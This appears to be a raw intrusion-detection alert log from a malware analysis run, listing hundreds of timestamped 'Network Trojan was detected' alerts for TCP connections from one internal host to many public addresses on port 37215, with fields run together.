      2025-02-12T16:57:29.312074+010028352221A Network Trojan was detected192.168.2.2335180157.122.225.20637215TCP
      2025-02-12T16:57:29.312149+010028352221A Network Trojan was detected192.168.2.233300471.66.178.6537215TCP
      2025-02-12T16:57:29.312370+010028352221A Network Trojan was detected192.168.2.234712441.179.90.22037215TCP
      2025-02-12T16:57:29.312370+010028352221A Network Trojan was detected192.168.2.2347444197.230.205.12337215TCP
      2025-02-12T16:57:29.312370+010028352221A Network Trojan was detected192.168.2.2354012157.121.237.19437215TCP
      2025-02-12T16:57:29.312487+010028352221A Network Trojan was detected192.168.2.235655241.119.119.8437215TCP
      2025-02-12T16:57:29.312487+010028352221A Network Trojan was detected192.168.2.234501467.62.43.6837215TCP
      2025-02-12T16:57:29.312562+010028352221A Network Trojan was detected192.168.2.2350256157.48.241.14337215TCP
      2025-02-12T16:57:29.312876+010028352221A Network Trojan was detected192.168.2.2354138197.169.235.9137215TCP
      2025-02-12T16:57:29.313622+010028352221A Network Trojan was detected192.168.2.234249441.253.31.16637215TCP
      2025-02-12T16:57:29.314136+010028352221A Network Trojan was detected192.168.2.2358296157.238.180.22937215TCP
      2025-02-12T16:57:29.316995+010028352221A Network Trojan was detected192.168.2.235247641.67.141.3537215TCP
      2025-02-12T16:57:29.316999+010028352221A Network Trojan was detected192.168.2.233457674.217.70.1237215TCP
      2025-02-12T16:57:29.317133+010028352221A Network Trojan was detected192.168.2.234892641.99.76.1337215TCP
      2025-02-12T16:57:29.317233+010028352221A Network Trojan was detected192.168.2.2357054157.237.20.4537215TCP
      2025-02-12T16:57:29.317664+010028352221A Network Trojan was detected192.168.2.2347886157.54.58.23137215TCP
      2025-02-12T16:57:29.343802+010028352221A Network Trojan was detected192.168.2.2345920169.146.85.24437215TCP
      2025-02-12T16:57:29.344563+010028352221A Network Trojan was detected192.168.2.2355092157.26.131.11937215TCP
      2025-02-12T16:57:29.344566+010028352221A Network Trojan was detected192.168.2.2357116157.45.241.11637215TCP
      2025-02-12T16:57:29.347502+010028352221A Network Trojan was detected192.168.2.2334226157.174.150.15537215TCP
      2025-02-12T16:57:29.351446+010028352221A Network Trojan was detected192.168.2.234092841.75.87.21537215TCP
      2025-02-12T16:57:30.280751+010028352221A Network Trojan was detected192.168.2.235486814.98.172.12337215TCP
      2025-02-12T16:57:30.296144+010028352221A Network Trojan was detected192.168.2.2338804197.6.118.5937215TCP
      2025-02-12T16:57:30.296335+010028352221A Network Trojan was detected192.168.2.2350384197.217.102.11137215TCP
      2025-02-12T16:57:30.297967+010028352221A Network Trojan was detected192.168.2.234632641.205.16.19237215TCP
      2025-02-12T16:57:30.300038+010028352221A Network Trojan was detected192.168.2.2359848157.55.7.7037215TCP
      2025-02-12T16:57:30.300075+010028352221A Network Trojan was detected192.168.2.2345576176.244.244.20137215TCP
      2025-02-12T16:57:30.313581+010028352221A Network Trojan was detected192.168.2.235714641.141.136.23437215TCP
      2025-02-12T16:57:30.315645+010028352221A Network Trojan was detected192.168.2.2347702197.196.251.737215TCP
      2025-02-12T16:57:30.315788+010028352221A Network Trojan was detected192.168.2.233731241.253.201.1837215TCP
      2025-02-12T16:57:30.342629+010028352221A Network Trojan was detected192.168.2.2342548197.78.175.8437215TCP
      2025-02-12T16:57:30.363670+010028352221A Network Trojan was detected192.168.2.2343218157.188.72.10737215TCP
      2025-02-12T16:57:32.347449+010028352221A Network Trojan was detected192.168.2.234742218.6.130.19737215TCP
      2025-02-12T16:57:32.347543+010028352221A Network Trojan was detected192.168.2.2340914197.81.39.13437215TCP
      2025-02-12T16:57:32.349106+010028352221A Network Trojan was detected192.168.2.2353466157.91.7.19937215TCP
      2025-02-12T16:57:32.349233+010028352221A Network Trojan was detected192.168.2.2344606152.16.16.14637215TCP
      2025-02-12T16:57:32.349236+010028352221A Network Trojan was detected192.168.2.233910041.132.145.2537215TCP
      2025-02-12T16:57:32.349239+010028352221A Network Trojan was detected192.168.2.235313241.204.209.9637215TCP
      2025-02-12T16:57:32.349342+010028352221A Network Trojan was detected192.168.2.234082287.175.46.16037215TCP
      2025-02-12T16:57:32.349507+010028352221A Network Trojan was detected192.168.2.2342274157.192.7.13237215TCP
      2025-02-12T16:57:32.349525+010028352221A Network Trojan was detected192.168.2.2341780197.156.123.22237215TCP
      2025-02-12T16:57:32.349673+010028352221A Network Trojan was detected192.168.2.2337340197.36.219.14537215TCP
      2025-02-12T16:57:32.349679+010028352221A Network Trojan was detected192.168.2.233940869.27.253.23037215TCP
      2025-02-12T16:57:32.349824+010028352221A Network Trojan was detected192.168.2.2346698197.120.29.18537215TCP
      2025-02-12T16:57:32.349850+010028352221A Network Trojan was detected192.168.2.2358894157.100.208.16637215TCP
      2025-02-12T16:57:32.350009+010028352221A Network Trojan was detected192.168.2.2356718110.170.212.10737215TCP
      2025-02-12T16:57:32.350016+010028352221A Network Trojan was detected192.168.2.233364496.21.12.16537215TCP
      2025-02-12T16:57:32.350019+010028352221A Network Trojan was detected192.168.2.2342730197.76.53.15237215TCP
      2025-02-12T16:57:32.350142+010028352221A Network Trojan was detected192.168.2.2337964197.52.127.23537215TCP
      2025-02-12T16:57:32.350163+010028352221A Network Trojan was detected192.168.2.2356108151.175.224.5437215TCP
      2025-02-12T16:57:32.350299+010028352221A Network Trojan was detected192.168.2.2360468197.81.150.237215TCP
      2025-02-12T16:57:32.350879+010028352221A Network Trojan was detected192.168.2.2353338197.180.30.10337215TCP
      2025-02-12T16:57:32.350897+010028352221A Network Trojan was detected192.168.2.2346064160.238.190.13837215TCP
      2025-02-12T16:57:32.350897+010028352221A Network Trojan was detected192.168.2.234647241.57.234.6537215TCP
      2025-02-12T16:57:32.351048+010028352221A Network Trojan was detected192.168.2.2360798197.195.222.22337215TCP
      2025-02-12T16:57:32.351062+010028352221A Network Trojan was detected192.168.2.2349962157.91.52.22337215TCP
      2025-02-12T16:57:32.351183+010028352221A Network Trojan was detected192.168.2.2357540116.33.253.16837215TCP
      2025-02-12T16:57:32.351194+010028352221A Network Trojan was detected192.168.2.235315241.31.88.22637215TCP
      2025-02-12T16:57:32.351210+010028352221A Network Trojan was detected192.168.2.235342041.161.255.8737215TCP
      2025-02-12T16:57:32.351210+010028352221A Network Trojan was detected192.168.2.233706041.222.42.8737215TCP
      2025-02-12T16:57:32.351231+010028352221A Network Trojan was detected192.168.2.2353234183.114.213.10837215TCP
      2025-02-12T16:57:32.351322+010028352221A Network Trojan was detected192.168.2.235756641.198.247.14037215TCP
      2025-02-12T16:57:32.351322+010028352221A Network Trojan was detected192.168.2.234527041.134.210.5537215TCP
      2025-02-12T16:57:32.351324+010028352221A Network Trojan was detected192.168.2.2351452188.202.42.13337215TCP
      2025-02-12T16:57:32.351370+010028352221A Network Trojan was detected192.168.2.2336618157.129.40.23637215TCP
      2025-02-12T16:57:32.351374+010028352221A Network Trojan was detected192.168.2.2340210157.235.66.1737215TCP
      2025-02-12T16:57:32.351961+010028352221A Network Trojan was detected192.168.2.2335772197.159.64.7137215TCP
      2025-02-12T16:57:32.352307+010028352221A Network Trojan was detected192.168.2.235667280.77.40.1337215TCP
      2025-02-12T16:57:32.352312+010028352221A Network Trojan was detected192.168.2.2343480197.235.72.22837215TCP
      2025-02-12T16:57:32.352334+010028352221A Network Trojan was detected192.168.2.2349692155.63.54.19537215TCP
      2025-02-12T16:57:32.352452+010028352221A Network Trojan was detected192.168.2.2340504157.107.67.11937215TCP
      2025-02-12T16:57:32.358693+010028352221A Network Trojan was detected192.168.2.235193641.132.254.12637215TCP
      2025-02-12T16:57:32.358760+010028352221A Network Trojan was detected192.168.2.2339880197.147.80.6537215TCP
      2025-02-12T16:57:32.359545+010028352221A Network Trojan was detected192.168.2.2340130157.45.26.11237215TCP
      2025-02-12T16:57:32.360412+010028352221A Network Trojan was detected192.168.2.2338506197.84.149.6337215TCP
      2025-02-12T16:57:32.364320+010028352221A Network Trojan was detected192.168.2.2350068157.17.34.21037215TCP
      2025-02-12T16:57:32.364334+010028352221A Network Trojan was detected192.168.2.2359270157.21.245.7337215TCP
      2025-02-12T16:57:32.364380+010028352221A Network Trojan was detected192.168.2.234275441.254.170.13237215TCP
      2025-02-12T16:57:32.364380+010028352221A Network Trojan was detected192.168.2.2334726197.8.154.10837215TCP
      2025-02-12T16:57:32.364385+010028352221A Network Trojan was detected192.168.2.2349450175.35.71.24237215TCP
      2025-02-12T16:57:33.345965+010028352221A Network Trojan was detected192.168.2.2338372157.16.81.17037215TCP
      2025-02-12T16:57:33.360812+010028352221A Network Trojan was detected192.168.2.2343254197.226.220.537215TCP
      2025-02-12T16:57:34.390055+010028352221A Network Trojan was detected192.168.2.2351366197.196.101.16837215TCP
      2025-02-12T16:57:34.393849+010028352221A Network Trojan was detected192.168.2.233986841.26.253.3337215TCP
      2025-02-12T16:57:35.390228+010028352221A Network Trojan was detected192.168.2.2344252118.246.28.7737215TCP
      2025-02-12T16:57:35.390230+010028352221A Network Trojan was detected192.168.2.235520873.137.65.18637215TCP
      2025-02-12T16:57:35.393567+010028352221A Network Trojan was detected192.168.2.2351740197.202.167.25237215TCP
      2025-02-12T16:57:35.394186+010028352221A Network Trojan was detected192.168.2.233708441.192.77.7137215TCP
      2025-02-12T16:57:35.394236+010028352221A Network Trojan was detected192.168.2.2358506197.159.16.21637215TCP
      2025-02-12T16:57:35.405775+010028352221A Network Trojan was detected192.168.2.2358702104.6.127.13337215TCP
      2025-02-12T16:57:35.459452+010028352221A Network Trojan was detected192.168.2.234319441.130.158.23137215TCP
      2025-02-12T16:57:36.390207+010028352221A Network Trojan was detected192.168.2.233712841.202.207.9037215TCP
      2025-02-12T16:57:36.390405+010028352221A Network Trojan was detected192.168.2.2346508157.181.0.22137215TCP
      2025-02-12T16:57:36.390496+010028352221A Network Trojan was detected192.168.2.234375241.59.210.24137215TCP
      2025-02-12T16:57:36.405788+010028352221A Network Trojan was detected192.168.2.2336260197.2.29.14637215TCP
      2025-02-12T16:57:36.436946+010028352221A Network Trojan was detected192.168.2.2358906142.56.38.4437215TCP
      2025-02-12T16:57:36.438749+010028352221A Network Trojan was detected192.168.2.2339480154.239.39.14937215TCP
      2025-02-12T16:57:36.438777+010028352221A Network Trojan was detected192.168.2.2348508197.181.15.3537215TCP
      2025-02-12T16:57:36.438830+010028352221A Network Trojan was detected192.168.2.2357362196.232.99.337215TCP
      2025-02-12T16:57:36.440744+010028352221A Network Trojan was detected192.168.2.2333898197.157.123.23037215TCP
      2025-02-12T16:57:36.772794+010028352221A Network Trojan was detected192.168.2.233374494.131.27.4237215TCP
      2025-02-12T16:57:37.421455+010028352221A Network Trojan was detected192.168.2.2340272110.54.53.20937215TCP
      2025-02-12T16:57:37.421475+010028352221A Network Trojan was detected192.168.2.236066241.105.179.7637215TCP
      2025-02-12T16:57:37.437149+010028352221A Network Trojan was detected192.168.2.234492441.161.81.16237215TCP
      2025-02-12T16:57:37.437984+010028352221A Network Trojan was detected192.168.2.2354044161.193.95.2837215TCP
      2025-02-12T16:57:37.438809+010028352221A Network Trojan was detected192.168.2.233950241.161.214.7237215TCP
      2025-02-12T16:57:37.453184+010028352221A Network Trojan was detected192.168.2.2353636157.37.59.8237215TCP
      2025-02-12T16:57:37.472181+010028352221A Network Trojan was detected192.168.2.2356196157.83.103.22237215TCP
      2025-02-12T16:57:37.588802+010028352221A Network Trojan was detected192.168.2.2354072197.7.146.20537215TCP
      2025-02-12T16:57:38.455764+010028352221A Network Trojan was detected192.168.2.2357296197.197.51.3437215TCP
      2025-02-12T16:57:38.470080+010028352221A Network Trojan was detected192.168.2.2347930197.172.22.13937215TCP
      2025-02-12T16:57:38.473773+010028352221A Network Trojan was detected192.168.2.2358122179.65.152.3837215TCP
      2025-02-12T16:57:38.485757+010028352221A Network Trojan was detected192.168.2.233675641.191.34.23537215TCP
      2025-02-12T16:57:38.487598+010028352221A Network Trojan was detected192.168.2.2350474197.115.157.8337215TCP
      2025-02-12T16:57:38.532176+010028352221A Network Trojan was detected192.168.2.233756483.255.87.17437215TCP
      2025-02-12T16:57:38.537068+010028352221A Network Trojan was detected192.168.2.2333356157.194.162.21337215TCP
      2025-02-12T16:57:39.197107+010028352221A Network Trojan was detected192.168.2.2336694157.90.116.2037215TCP
      2025-02-12T16:57:39.439273+010028352221A Network Trojan was detected192.168.2.234528041.222.129.9737215TCP
      2025-02-12T16:57:39.452952+010028352221A Network Trojan was detected192.168.2.2336174197.48.64.14737215TCP
      2025-02-12T16:57:39.469960+010028352221A Network Trojan was detected192.168.2.2350338197.188.236.037215TCP
      2025-02-12T16:57:39.472190+010028352221A Network Trojan was detected192.168.2.2346232197.94.12.17937215TCP
      2025-02-12T16:57:39.485544+010028352221A Network Trojan was detected192.168.2.2337204157.214.5.24237215TCP
      2025-02-12T16:57:39.487777+010028352221A Network Trojan was detected192.168.2.2343242162.43.119.24437215TCP
      2025-02-12T16:57:39.515102+010028352221A Network Trojan was detected192.168.2.233358241.22.147.21337215TCP
      2025-02-12T16:57:39.530843+010028352221A Network Trojan was detected192.168.2.2348128197.123.235.17637215TCP
      2025-02-12T16:57:39.530856+010028352221A Network Trojan was detected192.168.2.234359841.132.185.3437215TCP
      2025-02-12T16:57:39.548523+010028352221A Network Trojan was detected192.168.2.2351134191.251.110.9237215TCP
      2025-02-12T16:57:39.548626+010028352221A Network Trojan was detected192.168.2.2341910186.47.36.22037215TCP
      2025-02-12T16:57:39.550497+010028352221A Network Trojan was detected192.168.2.2346610157.85.121.17837215TCP
      2025-02-12T16:57:39.563694+010028352221A Network Trojan was detected192.168.2.2332810157.160.67.11837215TCP
      2025-02-12T16:57:39.563968+010028352221A Network Trojan was detected192.168.2.2332950197.77.197.3137215TCP
      2025-02-12T16:57:40.468513+010028352221A Network Trojan was detected192.168.2.2345476197.68.115.13137215TCP
      2025-02-12T16:57:40.488086+010028352221A Network Trojan was detected192.168.2.2358202157.190.147.11437215TCP
      2025-02-12T16:57:40.515254+010028352221A Network Trojan was detected192.168.2.233873441.61.28.13037215TCP
      2025-02-12T16:57:40.516860+010028352221A Network Trojan was detected192.168.2.2354450197.22.45.16237215TCP
      2025-02-12T16:57:40.520956+010028352221A Network Trojan was detected192.168.2.2357894197.53.129.14837215TCP
      2025-02-12T16:57:40.547240+010028352221A Network Trojan was detected192.168.2.2338474188.182.228.16237215TCP
      2025-02-12T16:57:40.562239+010028352221A Network Trojan was detected192.168.2.2341256157.148.57.3537215TCP
      2025-02-12T16:57:40.612714+010028352221A Network Trojan was detected192.168.2.233830841.133.92.20737215TCP
      2025-02-12T16:57:41.485804+010028352221A Network Trojan was detected192.168.2.2357568197.27.200.1037215TCP
      2025-02-12T16:57:43.566987+010028352221A Network Trojan was detected192.168.2.2343278197.79.208.22937215TCP
      2025-02-12T16:57:43.567407+010028352221A Network Trojan was detected192.168.2.2345268157.197.226.10137215TCP
      2025-02-12T16:57:43.567688+010028352221A Network Trojan was detected192.168.2.233393441.26.98.16937215TCP
      2025-02-12T16:57:43.568327+010028352221A Network Trojan was detected192.168.2.2349568157.239.44.12337215TCP
      2025-02-12T16:57:44.233955+010028352221A Network Trojan was detected192.168.2.2356192197.216.106.18937215TCP
      2025-02-12T16:57:44.515269+010028352221A Network Trojan was detected192.168.2.2350198132.239.200.3237215TCP
      2025-02-12T16:57:44.531494+010028352221A Network Trojan was detected192.168.2.2345516157.252.228.19737215TCP
      2025-02-12T16:57:44.532922+010028352221A Network Trojan was detected192.168.2.234501420.5.26.24937215TCP
      2025-02-12T16:57:44.534820+010028352221A Network Trojan was detected192.168.2.236095441.218.210.17337215TCP
      2025-02-12T16:57:44.535092+010028352221A Network Trojan was detected192.168.2.2344764105.167.255.19337215TCP
      2025-02-12T16:57:44.535173+010028352221A Network Trojan was detected192.168.2.2352482157.251.62.14837215TCP
      2025-02-12T16:57:44.535238+010028352221A Network Trojan was detected192.168.2.2348764137.79.239.19937215TCP
      2025-02-12T16:57:44.535299+010028352221A Network Trojan was detected192.168.2.2339300157.108.6.24237215TCP
      2025-02-12T16:57:44.539099+010028352221A Network Trojan was detected192.168.2.2337682157.29.129.14837215TCP
      2025-02-12T16:57:44.546533+010028352221A Network Trojan was detected192.168.2.2359464186.114.155.1537215TCP
      2025-02-12T16:57:44.546639+010028352221A Network Trojan was detected192.168.2.233659841.42.180.6737215TCP
      2025-02-12T16:57:44.547067+010028352221A Network Trojan was detected192.168.2.233890041.223.210.137215TCP
      2025-02-12T16:57:44.547146+010028352221A Network Trojan was detected192.168.2.2351552157.138.212.3537215TCP
      2025-02-12T16:57:44.547241+010028352221A Network Trojan was detected192.168.2.2357090197.217.111.12937215TCP
      2025-02-12T16:57:44.563796+010028352221A Network Trojan was detected192.168.2.2343802167.168.169.10737215TCP
      2025-02-12T16:57:47.325431+010028352221A Network Trojan was detected192.168.2.2336060197.147.158.9237215TCP
      2025-02-12T16:57:47.609177+010028352221A Network Trojan was detected192.168.2.235833041.219.106.15337215TCP
      2025-02-12T16:57:47.610731+010028352221A Network Trojan was detected192.168.2.2355376197.86.113.22437215TCP
      2025-02-12T16:57:47.697349+010028352221A Network Trojan was detected192.168.2.2338306111.201.68.19737215TCP
      2025-02-12T16:57:48.609392+010028352221A Network Trojan was detected192.168.2.2337864111.217.213.1637215TCP
      2025-02-12T16:57:48.609627+010028352221A Network Trojan was detected192.168.2.2342770197.135.21.19637215TCP
      2025-02-12T16:57:48.609631+010028352221A Network Trojan was detected192.168.2.23541561.161.165.23437215TCP
      2025-02-12T16:57:48.609810+010028352221A Network Trojan was detected192.168.2.2356620182.102.94.23037215TCP
      2025-02-12T16:57:48.609920+010028352221A Network Trojan was detected192.168.2.2338658197.177.143.11537215TCP
      2025-02-12T16:57:48.609940+010028352221A Network Trojan was detected192.168.2.2354428197.218.238.3437215TCP
      2025-02-12T16:57:48.610075+010028352221A Network Trojan was detected192.168.2.2340392197.68.191.20137215TCP
      2025-02-12T16:57:48.610102+010028352221A Network Trojan was detected192.168.2.2333412197.239.159.21037215TCP
      2025-02-12T16:57:48.610198+010028352221A Network Trojan was detected192.168.2.235475818.167.169.2037215TCP
      2025-02-12T16:57:48.610287+010028352221A Network Trojan was detected192.168.2.2335378209.126.247.5237215TCP
      2025-02-12T16:57:48.610374+010028352221A Network Trojan was detected192.168.2.235039641.215.63.7537215TCP
      2025-02-12T16:57:48.610973+010028352221A Network Trojan was detected192.168.2.2341980216.208.139.7137215TCP
      2025-02-12T16:57:48.610981+010028352221A Network Trojan was detected192.168.2.2344018197.3.249.16637215TCP
      2025-02-12T16:57:48.610981+010028352221A Network Trojan was detected192.168.2.2357756194.224.108.21637215TCP
      2025-02-12T16:57:48.611251+010028352221A Network Trojan was detected192.168.2.2342198197.201.162.19937215TCP
      2025-02-12T16:57:48.611282+010028352221A Network Trojan was detected192.168.2.2342066157.228.161.6637215TCP
      2025-02-12T16:57:48.611383+010028352221A Network Trojan was detected192.168.2.2356104157.129.158.16737215TCP
      2025-02-12T16:57:48.627345+010028352221A Network Trojan was detected192.168.2.2356578157.243.129.22237215TCP
      2025-02-12T16:57:48.628558+010028352221A Network Trojan was detected192.168.2.235146241.47.228.10737215TCP
      2025-02-12T16:57:48.628593+010028352221A Network Trojan was detected192.168.2.235659441.85.254.5837215TCP
      2025-02-12T16:57:48.641113+010028352221A Network Trojan was detected192.168.2.234355641.48.22.20937215TCP
      2025-02-12T16:57:48.642309+010028352221A Network Trojan was detected192.168.2.2350044197.224.69.25537215TCP
      2025-02-12T16:57:48.642612+010028352221A Network Trojan was detected192.168.2.234204441.120.112.20737215TCP
      2025-02-12T16:57:48.642662+010028352221A Network Trojan was detected192.168.2.2348080171.47.62.13737215TCP
      2025-02-12T16:57:48.643339+010028352221A Network Trojan was detected192.168.2.2341204197.187.105.23637215TCP
      2025-02-12T16:57:48.643363+010028352221A Network Trojan was detected192.168.2.235268041.158.16.16237215TCP
      2025-02-12T16:57:48.644281+010028352221A Network Trojan was detected192.168.2.2350194108.132.193.837215TCP
      2025-02-12T16:57:48.644309+010028352221A Network Trojan was detected192.168.2.233607698.33.67.19137215TCP
      2025-02-12T16:57:48.644679+010028352221A Network Trojan was detected192.168.2.2334214197.25.227.20537215TCP
      2025-02-12T16:57:50.265644+010028352221A Network Trojan was detected192.168.2.2343786182.242.216.10537215TCP
      2025-02-12T16:57:50.609368+010028352221A Network Trojan was detected192.168.2.23346365.200.230.21237215TCP
      2025-02-12T16:57:50.609423+010028352221A Network Trojan was detected192.168.2.2348116197.226.179.3037215TCP
      2025-02-12T16:57:50.609428+010028352221A Network Trojan was detected192.168.2.2350380157.167.56.6437215TCP
      2025-02-12T16:57:50.609445+010028352221A Network Trojan was detected192.168.2.2344938157.51.34.9137215TCP
      2025-02-12T16:57:50.609816+010028352221A Network Trojan was detected192.168.2.2357482157.124.94.17037215TCP
      2025-02-12T16:57:50.610119+010028352221A Network Trojan was detected192.168.2.2356462157.77.198.3137215TCP
      2025-02-12T16:57:50.610161+010028352221A Network Trojan was detected192.168.2.2339884129.23.104.5537215TCP
      2025-02-12T16:57:50.611378+010028352221A Network Trojan was detected192.168.2.233955431.202.193.9437215TCP
      2025-02-12T16:57:50.611576+010028352221A Network Trojan was detected192.168.2.2334954157.186.12.21937215TCP
      2025-02-12T16:57:50.613088+010028352221A Network Trojan was detected192.168.2.235297269.90.184.14237215TCP
      2025-02-12T16:57:50.625068+010028352221A Network Trojan was detected192.168.2.2343082157.235.226.3237215TCP
      2025-02-12T16:57:50.628960+010028352221A Network Trojan was detected192.168.2.235541841.41.140.22137215TCP
      2025-02-12T16:57:50.642483+010028352221A Network Trojan was detected192.168.2.234922041.228.247.837215TCP
      2025-02-12T16:57:50.642863+010028352221A Network Trojan was detected192.168.2.2350224157.185.187.15637215TCP
      2025-02-12T16:57:50.644265+010028352221A Network Trojan was detected192.168.2.2354982197.209.137.18337215TCP
      2025-02-12T16:57:50.644267+010028352221A Network Trojan was detected192.168.2.2354576219.221.14.13837215TCP
      2025-02-12T16:57:50.644361+010028352221A Network Trojan was detected192.168.2.2345572157.59.209.20637215TCP
      2025-02-12T16:57:50.644392+010028352221A Network Trojan was detected192.168.2.234907241.4.98.2037215TCP
      2025-02-12T16:57:50.646072+010028352221A Network Trojan was detected192.168.2.234409441.102.4.5837215TCP
      2025-02-12T16:57:50.646088+010028352221A Network Trojan was detected192.168.2.2350904197.85.137.21237215TCP
      2025-02-12T16:57:51.609370+010028352221A Network Trojan was detected192.168.2.2350978212.147.184.23337215TCP
      2025-02-12T16:57:51.609384+010028352221A Network Trojan was detected192.168.2.2341950157.175.118.16037215TCP
      2025-02-12T16:57:51.624543+010028352221A Network Trojan was detected192.168.2.2343244201.172.206.13537215TCP
      2025-02-12T16:57:51.624649+010028352221A Network Trojan was detected192.168.2.2344794157.178.233.24037215TCP
      2025-02-12T16:57:51.624767+010028352221A Network Trojan was detected192.168.2.2357176157.197.203.6737215TCP
      2025-02-12T16:57:51.624839+010028352221A Network Trojan was detected192.168.2.2333028212.198.239.10337215TCP
      2025-02-12T16:57:51.624968+010028352221A Network Trojan was detected192.168.2.235915641.214.14.12837215TCP
      2025-02-12T16:57:51.624971+010028352221A Network Trojan was detected192.168.2.2345608197.100.105.16337215TCP
      2025-02-12T16:57:51.625036+010028352221A Network Trojan was detected192.168.2.2337898197.93.162.20737215TCP
      2025-02-12T16:57:51.625619+010028352221A Network Trojan was detected192.168.2.2354558157.192.187.1537215TCP
      2025-02-12T16:57:51.626306+010028352221A Network Trojan was detected192.168.2.2332836169.43.80.13937215TCP
      2025-02-12T16:57:51.642040+010028352221A Network Trojan was detected192.168.2.2351928197.24.165.2537215TCP
      2025-02-12T16:57:51.642085+010028352221A Network Trojan was detected192.168.2.2336972144.111.209.9237215TCP
      2025-02-12T16:57:51.642093+010028352221A Network Trojan was detected192.168.2.2343166157.236.197.7437215TCP
      2025-02-12T16:57:51.642108+010028352221A Network Trojan was detected192.168.2.2357646157.100.39.20637215TCP
      2025-02-12T16:57:51.642181+010028352221A Network Trojan was detected192.168.2.2360600174.131.64.13037215TCP
      2025-02-12T16:57:51.642188+010028352221A Network Trojan was detected192.168.2.2360800157.238.225.7237215TCP
      2025-02-12T16:57:51.642191+010028352221A Network Trojan was detected192.168.2.235885841.196.48.24037215TCP
      2025-02-12T16:57:51.642199+010028352221A Network Trojan was detected192.168.2.233990441.75.138.19037215TCP
      2025-02-12T16:57:51.642203+010028352221A Network Trojan was detected192.168.2.2335288157.213.12.7837215TCP
      2025-02-12T16:57:51.642209+010028352221A Network Trojan was detected192.168.2.234106027.105.58.24837215TCP
      2025-02-12T16:57:51.642224+010028352221A Network Trojan was detected192.168.2.235448241.112.102.037215TCP
      2025-02-12T16:57:51.642225+010028352221A Network Trojan was detected192.168.2.2354566171.50.254.19937215TCP
      2025-02-12T16:57:51.642240+010028352221A Network Trojan was detected192.168.2.234811441.20.101.5437215TCP
      2025-02-12T16:57:51.642263+010028352221A Network Trojan was detected192.168.2.2357702197.115.118.19237215TCP
      2025-02-12T16:57:51.642271+010028352221A Network Trojan was detected192.168.2.2335608157.252.254.13737215TCP
      2025-02-12T16:57:51.642443+010028352221A Network Trojan was detected192.168.2.2333344197.128.79.2437215TCP
      2025-02-12T16:57:51.642495+010028352221A Network Trojan was detected192.168.2.2355992154.198.176.10537215TCP
      2025-02-12T16:57:51.642647+010028352221A Network Trojan was detected192.168.2.2341650197.2.15.3837215TCP
      2025-02-12T16:57:51.642648+010028352221A Network Trojan was detected192.168.2.2336476157.235.111.3537215TCP
      2025-02-12T16:57:51.642922+010028352221A Network Trojan was detected192.168.2.2353912157.30.224.18637215TCP
      2025-02-12T16:57:51.643680+010028352221A Network Trojan was detected192.168.2.2335846197.219.126.13637215TCP
      2025-02-12T16:57:51.643996+010028352221A Network Trojan was detected192.168.2.2350434157.133.82.17237215TCP
      2025-02-12T16:57:51.644067+010028352221A Network Trojan was detected192.168.2.2353338197.47.214.7937215TCP
      2025-02-12T16:57:51.644184+010028352221A Network Trojan was detected192.168.2.233424241.186.218.11637215TCP
      2025-02-12T16:57:51.644297+010028352221A Network Trojan was detected192.168.2.2344782129.179.64.11837215TCP
      2025-02-12T16:57:51.644392+010028352221A Network Trojan was detected192.168.2.234090041.149.31.437215TCP
      2025-02-12T16:57:51.644506+010028352221A Network Trojan was detected192.168.2.2334666154.157.77.23937215TCP
      2025-02-12T16:57:51.644557+010028352221A Network Trojan was detected192.168.2.2352674159.251.86.18637215TCP
      2025-02-12T16:57:51.644800+010028352221A Network Trojan was detected192.168.2.2355696157.51.118.14337215TCP
      2025-02-12T16:57:51.644887+010028352221A Network Trojan was detected192.168.2.234063841.61.237.17137215TCP
      2025-02-12T16:57:51.644961+010028352221A Network Trojan was detected192.168.2.2334042211.49.102.11737215TCP
      2025-02-12T16:57:51.645085+010028352221A Network Trojan was detected192.168.2.236090841.229.187.8737215TCP
      2025-02-12T16:57:51.645282+010028352221A Network Trojan was detected192.168.2.234081641.131.128.25237215TCP
      2025-02-12T16:57:51.645318+010028352221A Network Trojan was detected192.168.2.2359008157.177.240.5137215TCP
      2025-02-12T16:57:51.645958+010028352221A Network Trojan was detected192.168.2.2360120197.67.9.20837215TCP
      2025-02-12T16:57:51.646546+010028352221A Network Trojan was detected192.168.2.2340408157.16.22.20637215TCP
      2025-02-12T16:57:51.661635+010028352221A Network Trojan was detected192.168.2.234718641.200.202.23537215TCP
      2025-02-12T16:57:51.673403+010028352221A Network Trojan was detected192.168.2.2354490157.3.84.21737215TCP
      2025-02-12T16:57:51.673604+010028352221A Network Trojan was detected192.168.2.2344772126.228.22.23737215TCP
      2025-02-12T16:57:51.674728+010028352221A Network Trojan was detected192.168.2.2350442197.46.231.6437215TCP
      2025-02-12T16:57:51.675551+010028352221A Network Trojan was detected192.168.2.2339238157.232.122.11837215TCP
      2025-02-12T16:57:51.676397+010028352221A Network Trojan was detected192.168.2.234182241.24.252.4937215TCP
      2025-02-12T16:57:51.677457+010028352221A Network Trojan was detected192.168.2.2332878182.114.32.10437215TCP
      2025-02-12T16:57:54.687701+010028352221A Network Trojan was detected192.168.2.2334880197.171.131.1937215TCP
      2025-02-12T16:57:54.688165+010028352221A Network Trojan was detected192.168.2.2355532157.226.226.24937215TCP
      2025-02-12T16:57:54.738272+010028352221A Network Trojan was detected192.168.2.2350816197.13.234.4437215TCP
      2025-02-12T16:57:55.687565+010028352221A Network Trojan was detected192.168.2.235492241.154.11.23237215TCP
      2025-02-12T16:57:55.687629+010028352221A Network Trojan was detected192.168.2.2349946197.34.7.2437215TCP
      2025-02-12T16:57:55.687668+010028352221A Network Trojan was detected192.168.2.2346698157.220.38.8337215TCP
      2025-02-12T16:57:55.702957+010028352221A Network Trojan was detected192.168.2.234602441.177.124.16037215TCP
      2025-02-12T16:57:55.702959+010028352221A Network Trojan was detected192.168.2.2356080145.66.141.20237215TCP
      2025-02-12T16:57:55.703029+010028352221A Network Trojan was detected192.168.2.234381041.43.116.10337215TCP
      2025-02-12T16:57:55.703131+010028352221A Network Trojan was detected192.168.2.2352872202.61.136.6337215TCP
      2025-02-12T16:57:55.703145+010028352221A Network Trojan was detected192.168.2.2342840196.201.61.10437215TCP
      2025-02-12T16:57:55.703191+010028352221A Network Trojan was detected192.168.2.235739641.36.89.9737215TCP
      2025-02-12T16:57:55.704184+010028352221A Network Trojan was detected192.168.2.2344126137.88.3.10137215TCP
      2025-02-12T16:57:55.718812+010028352221A Network Trojan was detected192.168.2.2338402197.45.207.21937215TCP
      2025-02-12T16:57:55.718851+010028352221A Network Trojan was detected192.168.2.2350034197.98.87.9037215TCP
      2025-02-12T16:57:55.719061+010028352221A Network Trojan was detected192.168.2.2358772152.109.39.22437215TCP
